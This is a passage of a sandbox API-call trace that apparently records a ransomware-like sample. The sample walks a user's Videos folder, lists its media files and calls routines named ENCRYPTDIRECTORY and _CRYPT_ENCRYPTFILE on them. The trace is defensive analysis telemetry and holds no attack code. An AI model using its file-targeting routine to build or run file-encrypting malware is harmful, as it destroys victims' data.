lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0097.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0097.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.485] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0097.485] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0097.485] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0097.485] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x91451210, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x91451210, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9ed8, cFileName=".", cAlternateFileName="")) returned 0x41ac2c0 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x91451210, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x91451210, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9ed8, cFileName="..", cAlternateFileName="")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a80, ftCreationTime.dwHighDateTime=0x1d5e5d4, ftLastAccessTime.dwLowDateTime=0x562e60b0, ftLastAccessTime.dwHighDateTime=0x1d5ef80, ftLastWriteTime.dwLowDateTime=0x562e60b0, ftLastWriteTime.dwHighDateTime=0x1d5ef80, nFileSizeHigh=0x0, nFileSizeLow=0x139d5, dwReserved0=0x0, dwReserved1=0x43c9ed8, cFileName="8PG6kQ2SW4h7w.flv", cAlternateFileName="8PG6KQ~1.FLV")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e54f3e0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0xdcb950a0, ftLastAccessTime.dwHighDateTime=0x1d5eb24, ftLastWriteTime.dwLowDateTime=0xdcb950a0, ftLastWriteTime.dwHighDateTime=0x1d5eb24, nFileSizeHigh=0x0, nFileSizeLow=0x9e42, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9ua4aLpWeNEQZn vUIUd.mkv", cAlternateFileName="9UA4AL~1.MKV")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba7cc0, ftCreationTime.dwHighDateTime=0x1d5f012, ftLastAccessTime.dwLowDateTime=0xea544c10, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xea544c10, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0xa962, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9zsS8CRW.avi", cAlternateFileName="")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd412f2b0, ftCreationTime.dwHighDateTime=0x1d5e59f, ftLastAccessTime.dwLowDateTime=0x3ad28a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x3ad28a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x13b08, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="E8Q4uNIBQS8v.flv", cAlternateFileName="E8Q4UN~1.FLV")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2b66ed0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0xeebbe170, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xeebbe170, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xcaef, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="F0zOuSSpVPNmctC-N.swf", cAlternateFileName="F0ZOUS~1.SWF")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b1a42a0, ftCreationTime.dwHighDateTime=0x1d5ea66, ftLastAccessTime.dwLowDateTime=0xdc3b0be0, ftLastAccessTime.dwHighDateTime=0x1d5ea53, ftLastWriteTime.dwLowDateTime=0xdc3b0be0, ftLastWriteTime.dwHighDateTime=0x1d5ea53, nFileSizeHigh=0x0, nFileSizeLow=0xbbf4, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="gOxwTO2-sZ.mp4", cAlternateFileName="GOXWTO~1.MP4")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f3ab0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x82f1e440, ftLastAccessTime.dwHighDateTime=0x1d5eb1c, ftLastWriteTime.dwLowDateTime=0x82f1e440, ftLastWriteTime.dwHighDateTime=0x1d5eb1c, nFileSizeHigh=0x0, nFileSizeLow=0x16f6b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="NLad7.avi", cAlternateFileName="")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6aad530, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0x75221700, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x75221700, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0xde93, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="oxSznFWHwYcj-6Y.mkv", cAlternateFileName="OXSZNF~1.MKV")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a712c0, ftCreationTime.dwHighDateTime=0x1d5e934, ftLastAccessTime.dwLowDateTime=0x5c377970, ftLastAccessTime.dwHighDateTime=0x1d5e278, ftLastWriteTime.dwLowDateTime=0x5c377970, ftLastWriteTime.dwHighDateTime=0x1d5e278, nFileSizeHigh=0x0, nFileSizeLow=0x18f4f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="rggg9G4RHZvsA0kg01.flv", cAlternateFileName="RGGG9G~1.FLV")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x76577b0, ftLastAccessTime.dwHighDateTime=0x1d5e847, ftLastWriteTime.dwLowDateTime=0x76577b0, ftLastWriteTime.dwHighDateTime=0x1d5e847, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="T H0jeo_wwrX", cAlternateFileName="TH0JEO~1")) returned 1 [0097.486] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4304b0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xed3a4300, ftLastAccessTime.dwHighDateTime=0x1d5e933, ftLastWriteTime.dwLowDateTime=0xed3a4300, ftLastWriteTime.dwHighDateTime=0x1d5e933, nFileSizeHigh=0x0, nFileSizeLow=0x400f, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="wJA95KXdyH.flv", cAlternateFileName="WJA95K~1.FLV")) returned 1 [0097.487] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e24d0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xe, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3568, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﮨмńဓ+\x10")) returned 0 [0097.487] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0097.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|8PG6kQ2SW4h7w.flv|9ua4aLpWeNEQZn vUIUd.mkv|9zsS8CRW.avi|E8Q4uNIBQS8v.flv|F0zOuSSpVPNmctC-N.swf|gOxwTO2-sZ.mp4|NLad7.avi|oxSznFWHwYcj-6Y.mkv|rggg9G4RHZvsA0kg01.flv|wJA95KXdyH.flv", cchCount1=178, lpString2="", cchCount2=0) returned 3 [0097.487] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0097.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a80, ftCreationTime.dwHighDateTime=0x1d5e5d4, ftLastAccessTime.dwLowDateTime=0x562e60b0, ftLastAccessTime.dwHighDateTime=0x1d5ef80, ftLastWriteTime.dwLowDateTime=0x562e60b0, ftLastWriteTime.dwHighDateTime=0x1d5ef80, nFileSizeHigh=0x0, nFileSizeLow=0x139d5, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="8PG6kQ2SW4h7w.flv", cAlternateFileName="8PG6KQ~1.FLV")) returned 0x41ac280 [0097.487] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0097.487] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0097.487] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0097.487] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0097.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0097.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\8pg6kq2sw4h7w.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0097.488] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0097.488] CloseHandle (hObject=0x298) returned 1 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.489] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0097.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0097.490] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0097.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0097.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0097.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0097.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0097.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0097.491] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0097.491] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0097.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0097.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0097.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.492] RtlAllocateHeap 